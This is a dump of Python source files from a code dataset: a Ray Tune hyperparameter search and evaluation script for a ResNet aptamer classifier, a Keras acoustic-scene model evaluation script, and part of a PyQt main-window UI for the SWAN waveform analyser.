max_t=num_epochs,\n grace_period=5,\n reduction_factor=2)\n\n reporter = CLIReporter(\n parameter_columns=[\"lr\", \"batch_size\"],\n metric_columns=[\"loss\", \"acc\", \"training_iteration\"])\n\n analysis = tune.run(\n 
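        # tune.run drives the search: each sample draws a config from the spaces above,
        # the ASHA scheduler stops poorly performing trials early, and metric="acc" /
        # mode="max" refer to the values reported back by the
        # TuneReportCheckpointCallback inside train_resnet.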
tune.with_parameters(\n train_resnet,\n num_epochs=num_epochs,\n num_gpus=gpus_per_trial),\n resources_per_trial={\n \"cpu\": cpus_per_trial,\n \"gpu\": gpus_per_trial\n },\n metric=\"acc\",\n mode=\"max\",\n local_dir=\"./ray_results/\",\n config=config,\n num_samples=num_samples,\n scheduler=scheduler,\n progress_reporter=reporter,\n name=\"tune_res_drelu_asha\")\n\n print(\"Best hyperparameters found were: \", analysis.best_config)\n # analysis.to_csv('~/ray_results/' + config['datatype'])\n\ndef tune_asha_search(datatype, num_samples=10, num_epochs=10, gpus_per_trial=0, cpus_per_trial=1):\n config = {\n \"lr\": tune.uniform(1e-4, 1e-1),\n \"batch_size\": 64,\n \"dr\": tune.uniform(0.005, 0.5),\n \"datatype\": datatype\n }\n\n scheduler = ASHAScheduler(\n max_t=num_epochs,\n grace_period=5,\n reduction_factor=2)\n\n reporter = CLIReporter(\n parameter_columns=[\"lr\", \"batch_size\"],\n metric_columns=[\"loss\", \"acc\", \"training_iteration\"])\n\n bayesopt = BayesOptSearch(metric=\"mean_loss\", mode=\"min\")\n analysis = tune.run(\n tune.with_parameters(\n train_resnet,\n num_epochs=num_epochs,\n num_gpus=gpus_per_trial),\n resources_per_trial={\n \"cpu\": cpus_per_trial,\n \"gpu\": gpus_per_trial\n },\n metric=\"acc\",\n mode=\"max\",\n local_dir=\"./ray_results/\",\n config=config,\n num_samples=num_samples,\n search_alg=bayesopt,\n scheduler=scheduler,\n progress_reporter=reporter,\n name=\"tune_res_drelu_bayopt\")\n\n print(\"Best hyperparameters found were: \", analysis.best_config)\n # analysis.to_csv('~/ray_results/' + config['datatype'])\n\ndef exp_results_check(checkpoint_path, result_path, title):\n # example\n # checkpoint_file = './ray_results/tune_vae_asha/train_vae_a45d1_00000_0_batch_size=64,dr=0.029188,lr=0.0075796,z_dim=10_2021-07-13_12-50-57/checkpoints/epoch=28-step=15891.ckpt'\n checkpoint_file = checkpoint_path\n param_file = open(result_path, 'r')\n check_epoch = int(checkpoint_file.split(\"epoch=\", 1)[1].split('-', 1)[0])\n resultjsons = param_file.read().split('\\n')\n results = json.loads(resultjsons[check_epoch + 1])\n params = results['config']\n lr = params['lr']\n dr = params['dr']\n batch_size = params['batch_size']\n datatype = params['datatype']\n\n con = {'lr': lr, 'dr': dr, 'batch_size': batch_size, 'datatype': datatype}\n model = ResNetClassifier(con, 2, 18, optimizer='adam')\n\n checkpoint = torch.load(checkpoint_file)\n model.prepare_data()\n model.criterion.weight = torch.tensor([0., 0.]) # need to add as this is saved by the checkpoint file\n model.load_state_dict(checkpoint['state_dict'])\n\n model.eval()\n test_set = m.test_set_corr\n verdict = {'sequence':list(test_set.keys()), 'binary':list(test_set.values())}\n _verification = pd.DataFrame(verdict)\n ver_reader = m.NAReader(_verification, shuffle=False)\n\n ver_loader = torch.utils.data.DataLoader(\n ver_reader,\n batch_size=len(test_set.keys()),\n collate_fn=m.my_collate,\n # num_workers=4,\n # pin_memory=True,\n shuffle=False\n )\n\n for i, batch in enumerate(ver_loader):\n seqs, ohe, labels = batch\n softmax = model(ohe)\n\n preds = torch.argmax(softmax, 1).clone().double() # convert to torch float 64\n predcpu = list(preds.detach().cpu().numpy())\n ycpu = labels\n # ver_acc = sklearn.metrics.balanced_accuracy_score(ycpu, predcpu)\n # Make confusion Matrix\n y_true = ycpu.detach().cpu().numpy().astype('bool').tolist()\n y_pred = np.asarray(predcpu, dtype=np.bool).tolist()\n score = np.asarray([1 if x == y_pred[xid] else 0 for xid, x in enumerate(y_true)])\n ver_acc = np.mean(score)\n f1 
= sklearn.metrics.f1_score(y_true, y_pred)\n\n cm = sklearn.metrics.confusion_matrix(y_true, y_pred, normalize='true')\n df_cm = pd.DataFrame(cm, index=[0, 1], columns=[0, 1])\n plt.figure(figsize=(10, 7))\n ax = plt.subplot()\n seaborn.set(font_scale=3.0)\n seaborn.heatmap(df_cm, annot=True, ax=ax)\n label_font = {'size': '26'}\n ax.tick_params(axis='both', which='major', labelsize=40)\n ax.xaxis.set_ticklabels([\"0\", \"1\"])\n ax.yaxis.set_ticklabels([\"0\", \"1\"])\n # plt.title(title)\n plt.savefig('../../Dropbox (ASU)/Projects/Aptamer_ML/' + title)\n\n o = open('../../Dropbox (ASU)/Projects/Aptamer_ML/' + title + 'results.txt', \"w+\")\n print(\"Validation Loss\", results['loss'], file=o)\n print(\"Validation Accuracy\", results['acc'], file=o)\n print(\"Verification Accuracy:\", ver_acc, \"of dataset size:\", len(test_set.keys()), file=o)\n print(\"F1-score\", f1, file=o)\n o.close()\n\ndef exp_results_check_progress(checkpoint_path, hparams, progress, title):\n # example\n checkpoint_file = checkpoint_path\n # param_file = open(result_path, 'r')\n # check_epoch = int(checkpoint_file.split(\"epoch=\", 1)[1].split('-', 1)[0])\n # resultjsons = param_file.read().split('\\n')\n o = open(hparams, 'r')\n params = json.load(o)\n # params = results['config']\n lr = params['lr']\n dr = params['dr']\n batch_size = params['batch_size']\n datatype = params['datatype']\n\n progress = pd.read_csv(progress)\n loss = progress.iloc[-1].loss\n acc = progress.iloc[-1].acc\n\n con = {'lr': lr, 'dr': dr, 'batch_size': batch_size, 'datatype': datatype}\n model = ResNetClassifier(con, 2, 18, optimizer='adam')\n\n checkpoint = torch.load(checkpoint_file)\n model.prepare_data()\n model.criterion.weight = torch.tensor([0., 0.]) # need to add as this is saved by the checkpoint file\n model.load_state_dict(checkpoint['state_dict'])\n\n model.eval()\n test_set = m.test_set_corr\n verdict = {'sequence': list(test_set.keys()), 'binary': list(test_set.values())}\n _verification = pd.DataFrame(verdict)\n ver_reader = m.NAReader(_verification, shuffle=False)\n\n\n ver_loader = torch.utils.data.DataLoader(\n ver_reader,\n batch_size=len(test_set.keys()),\n collate_fn=m.my_collate,\n # num_workers=4,\n # pin_memory=True,\n shuffle=False\n )\n\n for i, batch in enumerate(ver_loader):\n seqs, ohe, labels = batch\n softmax = model(ohe)\n\n preds = torch.argmax(softmax, 1).clone().double() # convert to torch float 64\n predcpu = list(preds.detach().cpu().numpy())\n ycpu = labels\n # ver_acc = sklearn.metrics.balanced_accuracy_score(ycpu, predcpu)\n\n # Make confusion Matrix\n y_true = ycpu.detach().cpu().numpy().astype('bool').tolist()\n y_pred = np.asarray(predcpu, dtype=np.bool).tolist()\n score = np.asarray([1 if x == y_pred[xid] else 0 for xid, x in enumerate(y_true)])\n ver_acc = np.mean(score)\n f1 = sklearn.metrics.f1_score(y_true, y_pred)\n\n cm = sklearn.metrics.confusion_matrix(y_true, y_pred, normalize='true')\n df_cm = pd.DataFrame(cm, index=[0, 1], columns=[0, 1])\n plt.figure(figsize=(10, 7))\n ax = plt.subplot()\n seaborn.set(font_scale=3.0)\n seaborn.heatmap(df_cm, annot=True, ax=ax)\n label_font = {'size': '26'}\n ax.tick_params(axis='both', which='major', labelsize=40)\n ax.xaxis.set_ticklabels([\"0\", \"1\"])\n ax.yaxis.set_ticklabels([\"0\", \"1\"])\n # plt.title(title)\n plt.savefig('../../Dropbox (ASU)/Projects/Aptamer_ML/' + title)\n\n o = open('../../Dropbox (ASU)/Projects/Aptamer_ML/' + title + 'results.txt', \"w+\")\n print(\"Validation Loss\", loss, file=o)\n print(\"Validation Accuracy\", acc, 
file=o)\n print(\"Verification Accuracy:\", ver_acc, \"of dataset size:\", len(test_set.keys()), file=o)\n print(\"F1-score\", f1, file=o)\n o.close()\n\ndef val_results_check(checkpoint_path, hparams, progress, result_path, title, r=True):\n # example\n # checkpoint_file = './ray_results/tune_vae_asha/train_vae_a45d1_00000_0_batch_size=64,dr=0.029188,lr=0.0075796,z_dim=10_2021-07-13_12-50-57/checkpoints/epoch=28-step=15891.ckpt'\n checkpoint_file = checkpoint_path\n if r:\n param_file = open(result_path, 'r')\n check_epoch = int(checkpoint_file.split(\"epoch=\", 1)[1].split('-', 1)[0])\n resultjsons = param_file.read().split('\\n')\n results = json.loads(resultjsons[check_epoch + 1])\n params = results['config']\n lr = params['lr']\n dr = params['dr']\n batch_size = params['batch_size']\n datatype = params['datatype']\n loss = results['loss']\n acc = results['acc']\n else:\n o = open(hparams, 'r')\n params = json.load(o)\n # params = results['config']\n lr = params['lr']\n dr = params['dr']\n batch_size = params['batch_size']\n datatype = params['datatype']\n\n progress = pd.read_csv(progress)\n loss = progress.iloc[-1].loss\n acc = progress.iloc[-1].acc\n\n con = {'lr': lr, 'dr': dr, 'batch_size': batch_size, 'datatype': datatype}\n model = ResNetClassifier(con, 2, 18, optimizer='adam')\n\n checkpoint = torch.load(checkpoint_file)\n model.prepare_data()\n model.criterion.weight = torch.tensor([0., 0.]) # need to add as this is saved by the checkpoint file\n model.load_state_dict(checkpoint['state_dict'])\n\n model.eval()\n vd = model.val_dataloader()\n\n yt, yp = [], []\n for i, batch in enumerate(vd):\n seqs, ohe, labels = batch\n softmax = model(ohe)\n\n preds = torch.argmax(softmax, 1).clone().double() # convert to torch float 64\n predcpu = list(preds.detach().cpu().numpy())\n ycpu = labels\n\n\n # Make confusion Matrix\n y_true = ycpu.detach().cpu().numpy().astype('bool').tolist()\n y_pred = np.asarray(predcpu, dtype=np.bool).tolist()\n yt += y_true\n yp += y_pred\n\n ver_acc = np.mean(np.asarray([1 if x == yp[xid] else 0 for xid, x in enumerate(yt)]))\n # ver_acc = sklearn.metrics.balanced_accuracy_score(yt, yp)\n cm = sklearn.metrics.confusion_matrix(yt, yp, normalize='true')\n df_cm = pd.DataFrame(cm, index=[0, 1], columns=[0, 1])\n plt.figure(figsize=(10, 7))\n ax = plt.subplot()\n seaborn.set(font_scale=3.0)\n seaborn.heatmap(df_cm, annot=True, ax=ax)\n label_font = {'size': '26'}\n ax.tick_params(axis='both', which='major', labelsize=40)\n ax.xaxis.set_ticklabels([\"0\", \"1\"])\n ax.yaxis.set_ticklabels([\"0\", \"1\"])\n # plt.title(title)\n plt.savefig('../../Dropbox (ASU)/Projects/Aptamer_ML/' + title + \"_VER\")\n\n o = open('../../Dropbox (ASU)/Projects/Aptamer_ML/' + title + 'results_ver.txt', \"w+\")\n print(\"Validation Loss\", loss, file=o)\n print(\"Validation Accuracy\", acc, file=o)\n print(\"Verification Accuracy:\", ver_acc, \"of dataset size:\", len(yt), file=o)\n o.close()\n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Resnet Training on Aptamer Dataset\")\n parser.add_argument('dataset', type=str, help=\"3-7 letter/number abbreviation describing subset of the data to use\")\n parser.add_argument('cpus_per_trial', type=str, help=\"Number of cpus available to each trial in Ray Tune\")\n parser.add_argument('gpus_per_trial', type=str, help=\"Number of gpus available to each trial in Ray Tune\")\n parser.add_argument('samples', type=str, help=\"Number of Ray Tune Samples\")\n args = parser.parse_args()\n 
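    # Setting SLURM_JOB_NAME to "bash" below is a common workaround so that
    # PyTorch Lightning does not mistake the Ray Tune worker processes for a
    # SLURM-managed job when this script is launched from inside a SLURM allocation.
    # Illustrative invocation (script name is hypothetical; the four positional
    # arguments follow the parser defined above):
    #   python resnet_tune.py HCL 4 1 10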
os.environ[\"SLURM_JOB_NAME\"] = \"bash\"\n\n tune_asha(args.dataset, int(args.samples), 30, gpus_per_trial=int(args.gpus_per_trial), cpus_per_trial=int(args.cpus_per_trial))\n # tune_asha_search(args.dataset, int(args.samples), 50, gpus_per_trial=int(args.gpus_per_trial), cpus_per_trial=int(args.cpus_per_trial))\n\n ### Debugging\n # con = {'lr': 1e-4, 'dr': 0.1, 'batch_size': 32, 'datatype': 'HCL'}\n #\n # model = ResNetClassifier(con, 2, 18)\n #\n ## Single Loop debugging\n # model.prepare_data()\n # d = model.train_dataloader()\n # for i, batch in enumerate(d):\n # if i > 0:\n # break\n # else:\n # model.training_step(batch, i)\n\n # pytorch lightning loop\n # rn = ResNetClassifier(con, 2, 18, optimizer='adam')\n # plt = pl.Trainer(gpus=1)\n # plt.fit(rn)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"} {"ext": "py", "sha": "1a30bda7eaa99fc763bc21d8b15291df971feba6", "content": "##### For testing the original keras model, which is saved as .hdf5 format.\n\nimport os\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n\nimport numpy as np\nimport h5py\nimport scipy.io\nimport pandas as pd\nimport librosa\nimport soundfile as sound\nimport keras\nimport tensorflow\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import log_loss\nimport sys\nsys.path.append(\"..\")\nfrom utils import *\nfrom funcs import *\n\nfrom tensorflow import ConfigProto\nfrom tensorflow import InteractiveSession\nconfig = ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = InteractiveSession(config=config)\n\nval_csv = 'data_2020/evaluation_setup/fold1_evaluate.csv'\nfeat_path = 'features/logmel128_scaled_d_dd/'\nmodel_path = '../pretrained_models/smallfcnn-model-0.9618.hdf5'\n\nnum_freq_bin = 128\nnum_classes = 3\n\ndata_val, y_val = load_data_2020(feat_path, val_csv, num_freq_bin, 'logmel')\ny_val_onehot = keras.utils.to_categorical(y_val, num_classes)\n\nprint(data_val.shape)\nprint(y_val.shape)\n\nbest_model = keras.models.load_model(model_path)\npreds = best_model.predict(data_val)\n\ny_pred_val = np.argmax(preds,axis=1)\n\nover_loss = log_loss(y_val_onehot, preds)\noverall_acc = np.sum(y_pred_val==y_val) / data_val.shape[0]\n\nprint(y_val_onehot.shape, preds.shape)\nnp.set_printoptions(precision=3)\n\nprint(\"\\n\\nVal acc: \", \"{0:.3f}\".format(overall_acc))\nprint(\"Val log loss:\", \"{0:.3f}\".format(over_loss))\n\nconf_matrix = confusion_matrix(y_val,y_pred_val)\nprint(\"\\n\\nConfusion matrix:\")\nprint(conf_matrix)\nconf_mat_norm_recall = conf_matrix.astype('float32')/conf_matrix.sum(axis=1)[:,np.newaxis]\nrecall_by_class = np.diagonal(conf_mat_norm_recall)\nmean_recall = np.mean(recall_by_class)\n\ndev_test_df = pd.read_csv(val_csv,sep='\\t', encoding='ASCII')\nClassNames = np.unique(dev_test_df['scene_label'])\n\nprint(\"Class names:\", ClassNames)\nprint(\"Per-class val acc: \",recall_by_class, \"\\n\\n\")\n\n\n\n\n\n"} {"ext": "py", "sha": "1a30be050f88378838d51722197d6a1666cd1271", "content": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 2 23:26:08 2017\n\n@author: Shashwat Sridhar\n\"\"\"\n# system imports\nfrom pyqtgraph.Qt import QtCore, QtGui, QtWidgets\nfrom os import sep\n\n# swan-specific imports\nfrom swan.views.mean_waveforms_view import PgWidget2d\nfrom swan.views.virtual_units_view import VirtualUnitsView\nfrom swan.widgets.plot_grid import MyPlotGrid\nfrom swan.views.isi_histograms_view import PgWidgetISI\nfrom swan.views.pca_3d_view import PgWidgetPCA\nfrom swan.views.rate_profile_view 
import PgWidgetRateProfile\nfrom swan.widgets.plot_grid_tools import PlotGridTools\nfrom swan.widgets.view_toolbar import CollapsibleWidget\n\nfrom swan.resources import icons\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _from_utf_8(s):\n return s\n\ntry:\n _encoding = QtWidgets.QApplication.UnicodeUTF8\n\n\n def _translate(context, text, disambig):\n return QtWidgets.QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n def _translate(context, text, disambig):\n return QtWidgets.QApplication.translate(context, text, disambig)\n\n\nclass MainUI(object):\n def __init__(self, main_application):\n main_application.setObjectName(_from_utf_8(\"Main\"))\n\n main_application.setDockOptions(QtWidgets.QMainWindow.AllowTabbedDocks |\n QtWidgets.QMainWindow.AllowNestedDocks |\n QtWidgets.QMainWindow.GroupedDragging)\n\n self.plotGridDock = QtWidgets.QDockWidget(\"Plot Grid\")\n self.plotGridDock.setObjectName(_from_utf_8(\"PlotGridDock\"))\n self.plotGrid = MyPlotGrid(main_application)\n self.plotGridDock.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable |\n QtWidgets.QDockWidget.DockWidgetFloatable)\n self.plotGridDock.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)\n self.plotGridDock.setWidget(self.plotGrid)\n\n self.dock_virtual_unit_view = QtWidgets.QDockWidget(\"Virtual Unit Mappings\")\n self.dock_virtual_unit_view.setObjectName(_from_utf_8(\"virtualUnitsDock\"))\n self.dock_virtual_unit_view.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable |\n QtWidgets.QDockWidget.DockWidgetFloatable)\n self.dock_virtual_unit_view.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)\n\n self.virtual_units_view = VirtualUnitsView()\n self.virtual_units_view.setObjectName(_from_utf_8(\"virtualUnitsView\"))\n\n self.dock_virtual_unit_view.setWidget(self.virtual_units_view)\n\n self.dock_mean_waveforms_view = QtWidgets.QDockWidget(\"Mean Waveforms\")\n self.dock_mean_waveforms_view.setObjectName(_from_utf_8(\"meanWaveformView\"))\n self.dock_mean_waveforms_view.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable |\n QtWidgets.QDockWidget.DockWidgetFloatable)\n self.dock_mean_waveforms_view.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)\n\n self.mean_waveforms_view = PgWidget2d()\n self.mean_waveforms_view.setObjectName(_from_utf_8(\"meanWaveformsView\"))\n\n self.dock_mean_waveforms_view.setWidget(self.mean_waveforms_view)\n\n self.dock_isi_histograms_view = QtWidgets.QDockWidget(\"ISI Histograms\")\n self.dock_isi_histograms_view.setObjectName(_from_utf_8(\"ISIHView\"))\n self.dock_isi_histograms_view.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable |\n QtWidgets.QDockWidget.DockWidgetFloatable)\n self.dock_isi_histograms_view.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)\n\n self.isi_histograms_view = PgWidgetISI()\n self.isi_histograms_view.setObjectName(_from_utf_8(\"IsihView\"))\n\n self.dock_isi_histograms_view.setWidget(self.isi_histograms_view)\n\n self.dock_pca_3d_view = QtWidgets.QDockWidget(\"Principal Component Analysis\")\n self.dock_pca_3d_view.setObjectName(_from_utf_8(\"PCAView\"))\n self.dock_pca_3d_view.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable |\n QtWidgets.QDockWidget.DockWidgetFloatable)\n self.dock_pca_3d_view.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)\n\n self.pca_3d_view = PgWidgetPCA()\n self.pca_3d_view.setObjectName(_from_utf_8(\"PcaView\"))\n\n self.dock_pca_3d_view.setWidget(self.pca_3d_view)\n\n self.dock_rate_profiles_view = QtWidgets.QDockWidget(\"Rate Profiles\")\n 
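        # This dock repeats the same setup used for the view docks above: create the
        # QDockWidget, give it an object name, restrict it to movable/floatable,
        # allow every dock area, then attach the view via setWidget(). A small
        # hypothetical helper (not part of SWAN) could factor that pattern out:
        #
        #   def _make_view_dock(title, object_name, view_widget):
        #       dock = QtWidgets.QDockWidget(title)
        #       dock.setObjectName(_from_utf_8(object_name))
        #       dock.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable |
        #                        QtWidgets.QDockWidget.DockWidgetFloatable)
        #       dock.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)
        #       dock.setWidget(view_widget)
        #       return dock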
self.dock_rate_profiles_view.setObjectName(_from_utf_8(\"RateProfiles\"))\n self.dock_rate_profiles_view.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable |\n QtWidgets.QDockWidget.DockWidgetFloatable)\n self.dock_rate_profiles_view.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)\n\n self.rate_profiles_view = PgWidgetRateProfile()\n self.rate_profiles_view.setObjectName(_from_utf_8(\"RateProfileView\"))\n\n self.dock_rate_profiles_view.setWidget(self.rate_profiles_view)\n\n self.tools = PlotGridTools()\n\n self.plotGridOptionsLayout = QtWidgets.QGridLayout()\n self.plotGridOptionsLayout.setObjectName(_from_utf_8(\"PlotGridOptionsLayout\"))\n\n self.plotGridOptionsLayout.addWidget(self.tools)\n self.plotGridOptions = CollapsibleWidget(parent=self.plotGrid, title=\"Options\", animation_duration=400)\n self.plotGridOptions.set_content_layout(self.plotGridOptionsLayout)\n\n self.plotGrid.main_grid_layout.addWidget(self.plotGridOptions, 1, 0)\n self.plotGrid.main_grid_layout.setRowStretch(0, 10)\n\n self.menu_bar = QtWidgets.QMenuBar(main_application)\n self.menu_bar.setGeometry(QtCore.QRect(0, 0, 1159, 25))\n self.menu_bar.setObjectName(_from_utf_8(\"menubar\"))\n self.menu_File = QtWidgets.QMenu(self.menu_bar)\n self.menu_File.setObjectName(_from_utf_8(\"menu_File\"))\n self.menu_Edit = QtWidgets.QMenu(self.menu_bar)\n self.menu_Edit.setObjectName(_from_utf_8(\"menu_Edit\"))\n self.menu_Help = QtWidgets.QMenu(self.menu_bar)\n self.menu_Help.setObjectName(_from_utf_8(\"menu_Help\"))\n self.menu_View = QtWidgets.QMenu(self.menu_bar)\n self.menu_View.setObjectName(_from_utf_8(\"menu_View\"))\n main_application.setMenuBar(self.menu_bar)\n self.statusbar = QtWidgets.QStatusBar(main_application)\n self.statusbar.setObjectName(_from_utf_8(\"statusbar\"))\n main_application.setStatusBar(self.statusbar)\n self.toolbar = QtWidgets.QToolBar(main_application)\n self.toolbar.setObjectName(_from_utf_8(\"toolBar\"))\n main_application.addToolBar(QtCore.Qt.TopToolBarArea, self.toolbar)\n self.action_new_project = QtWidgets.QAction(main_application)\n self.action_new_project.setObjectName(_from_utf_8(\"action_new_project\"))\n self.action_load_project = QtWidgets.QAction(main_application)\n self.action_load_project.setObjectName(_from_utf_8(\"action_load_project\"))\n self.action_save_project = QtWidgets.QAction(main_application)\n self.action_save_project.setObjectName(_from_utf_8(\"action_save_project\"))\n self.action_quit = QtWidgets.QAction(main_application)\n self.action_quit.setObjectName(_from_utf_8(\"action_quit\"))\n self.action_swap = QtWidgets.QAction(main_application)\n self.action_swap.setObjectName(_from_utf_8(\"action_swap\"))\n self.action_collapse = QtWidgets.QAction(main_application)\n self.action_collapse.setObjectName(_from_utf_8(\"action_collapse\"))\n self.action_recalculate_mapping = QtWidgets.QAction(main_application)\n self.action_recalculate_mapping.setObjectName(_from_utf_8(\"action_recalculate_mapping\"))\n self.action_save_as = QtWidgets.QAction(main_application)\n self.action_save_as.setObjectName(_from_utf_8(\"action_save_as\"))\n self.action_load_connector_map = QtWidgets.QAction(main_application)\n self.action_load_connector_map.setObjectName(_from_utf_8(\"action_load_connector_map\"))\n self.action_zoom_in = QtWidgets.QAction(main_application)\n self.action_zoom_in.setObjectName(_from_utf_8(\"action_zoom_in\"))\n self.action_zoom_out = QtWidgets.QAction(main_application)\n self.action_zoom_out.setObjectName(_from_utf_8(\"action_zoom_out\"))\n self.action_revert_mapping = 
QtWidgets.QAction(main_application)\n self.action_revert_mapping.setObjectName(_from_utf_8(\"action_revert_mapping\"))\n self.action_collapse_overview = QtWidgets.QAction(main_application)\n self.action_collapse_overview.setObjectName(_from_utf_8(\"action_collapse_overview\"))\n self.action_expand_overview = QtWidgets.QAction(main_application)\n self.action_expand_overview.setObjectName(_from_utf_8(\"action_expand_overview\"))\n self.action_preferences = QtWidgets.QAction(main_application)\n self.action_preferences.setObjectName(_from_utf_8(\"action_preferences\"))\n self.action_about = QtWidgets.QAction(main_application)\n self.action_about.setObjectName(_from_utf_8(\"action_about\"))\n self.action_tutorials = QtWidgets.QAction(main_application)\n self.action_tutorials.setObjectName(_from_utf_8(\"action_tutorials\"))\n self.action_export_to_csv = QtWidgets.QAction(main_application)\n self.action_export_to_csv.setObjectName(_from_utf_8(\"action_export_to_csv\"))\n self.action_export_to_odml = QtWidgets.QAction(main_application)\n self.action_export_to_odml.setObjectName(_from_utf_8(\"action_export_to_odml\"))\n self.action_import_from_csv = QtWidgets.QAction(main_application)\n self.action_import_from_csv.setObjectName(_from_utf_8(\"action_import_from_csv\"))\n self.action_import_from_od_ml = QtWidgets.QAction(main_application)\n self.action_import_from_od_ml.setObjectName(_from_utf_8(\"action_import_from_od_ml\"))\n self.action_revert_state = QtWidgets.QAction(main_application)\n self.action_revert_state.setObjectName(_from_utf_8(\"action_revert_state\"))\n self.action_restore_state = QtWidgets.QAction(main_application)\n self.action_restore_state.setObjectName(_from_utf_8(\"action_restore_state\"))\n self.action_save_state = QtWidgets.QAction(main_application)\n self.action_save_state.setObjectName(_from_utf_8(\"action_save_state\"))\n\n self.menu_File.addAction(self.action_new_project)\n self.menu_File.addAction(self.action_load_project)\n self.menu_File.addAction(self.action_save_project)\n self.menu_File.addAction(self.action_save_as)\n self.menu_File.addSeparator()\n self.menu_File.addAction(self.action_load_connector_map)\n self.menu_File.addAction(self.action_export_to_csv)\n self.menu_File.addAction(self.action_export_to_odml)\n self.menu_File.addSeparator()\n self.menu_File.addAction(self.action_quit)\n\n self.menu_Edit.addAction(self.action_recalculate_mapping)\n self.menu_Edit.addAction(self.action_revert_mapping)\n self.menu_Edit.addAction(self.action_swap)\n self.menu_Edit.addSeparator()\n self.menu_Edit.addAction(self.action_zoom_in)\n self.menu_Edit.addAction(self.action_zoom_out)\n self.menu_Edit.addAction(self.action_expand_overview)\n self.menu_Edit.addAction(self.action_collapse_overview)\n self.menu_Edit.addSeparator()\n self.menu_Edit.addAction(self.action_preferences)\n\n self.menu_Help.addAction(self.action_tutorials)\n self.menu_Help.addAction(self.action_about)\n self.menu_View.addAction(self.action_save_state)\n self.menu_View.addAction(self.action_restore_state)\n self.menu_View.addAction(self.action_revert_state)\n\n self.menu_bar.addAction(self.menu_File.menuAction())\n self.menu_bar.addAction(self.menu_Edit.menuAction())\n self.menu_bar.addAction(self.menu_View.menuAction())\n self.menu_bar.addAction(self.menu_Help.menuAction())\n\n self.toolbar.addAction(self.action_new_project)\n self.toolbar.addAction(self.action_load_project)\n self.toolbar.addAction(self.action_save_project)\n self.toolbar.addAction(self.action_save_as)\n 
self.toolbar.addAction(self.action_preferences)\n self.toolbar.addSeparator()\n self.toolbar.addAction(self.action_revert_mapping)\n self.toolbar.addAction(self.action_swap)\n self.toolbar.addSeparator()\n self.toolbar.addAction(self.action_zoom_in)\n self.toolbar.addAction(self.action_zoom_out)\n self.toolbar.addAction(self.action_expand_overview)\n self.toolbar.addAction(self.action_collapse_overview)\n\n self.load_icons()\n self.retranslate_ui(main_application)\n\n main_application.addDockWidget(QtCore.Qt.LeftDockWidgetArea, self.plotGridDock, QtCore.Qt.Vertical)\n main_application.addDockWidget(QtCore.Qt.LeftDockWidgetArea, self.dock_virtual_unit_view, QtCore.Qt.Vertical)\n main_application.addDockWidget(QtCore.Qt.LeftDockWidgetArea, self.dock_rate_profiles_view, QtCore.Qt.Vertical)\n main_application.addDockWidget(QtCore.Qt.LeftDockWidgetArea, self.dock_pca_3d_view, QtCore.Qt.Vertical)\n main_application.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.dock_mean_waveforms_view, QtCore.Qt.Vertical)\n main_application.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.dock_isi_histograms_view, QtCore.Qt.Vertical)\n\n main_application.splitDockWidget(self.plotGridDock, self.dock_virtual_unit_view, QtCore.Qt.Horizontal)\n main_application.splitDockWidget(self.dock_virtual_unit_view, self.dock_rate_profiles_view, QtCore.Qt.Horizontal)\n main_application.splitDockWidget(self.dock_rate_profiles_view, self.dock_pca_3d_view, QtCore.Qt.Vertical)\n\n # self.action_quit.triggered.connect(main_application.close)\n QtCore.QMetaObject.connectSlotsByName(main_application)\n\n @staticmethod\n def set_program_title(main_application, text):\n main_application.setWindowTitle(_translate(\"main_application\", text, None))\n\n def retranslate_ui(self, main_application):\n main_application.setWindowTitle(_translate(\"main_application\", \"SWAN - Sequential waveform analyser\", None))\n self.menu_File.setTitle(_translate(\"main_application\", \"&File\", None))\n self.menu_Edit.setTitle(_translate(\"main_application\", \"&Edit\", None))\n self.menu_Help.setTitle(_translate(\"main_application\", \"&Help\", None))\n self.menu_View.setTitle(_translate(\"main_application\", \"&View\", None))\n self.toolbar.setWindowTitle(_translate(\"main_application\", \"toolBar\", None))\n self.action_new_project.setText(_translate(\"main_application\", \"&New Project...\", None))\n self.action_new_project.setIconText(_translate(\"main_application\", \"New Project...\", None))\n self.action_new_project.setToolTip(_translate(\"main_application\", \"Create a new project\", None))\n self.action_new_project.setShortcut(_translate(\"main_application\", \"Ctrl+N\", None))\n self.action_load_project.setText(_translate(\"main_application\", \"&Load Project...\", None))\n self.action_load_project.setIconText(_translate(\"main_application\", \"Load Project...\", None))\n self.action_load_project.setToolTip(_translate(\"main_application\", \"Load project from file\", None))\n self.action_load_project.setShortcut(_translate(\"main_application\", \"Ctrl+O\", None))\n self.action_save_project.setText(_translate(\"main_application\", \"&Save Project\", None))\n self.action_save_project.setIconText(_translate(\"main_application\", \"Save Project\", None))\n self.action_save_project.setToolTip(_translate(\"main_application\", \"Save project\", None))\n self.action_save_project.setShortcut(_translate(\"main_application\", \"Ctrl+S\", None))\n self.action_quit.setText(_translate(\"main_application\", \"&Quit\", None))\n 
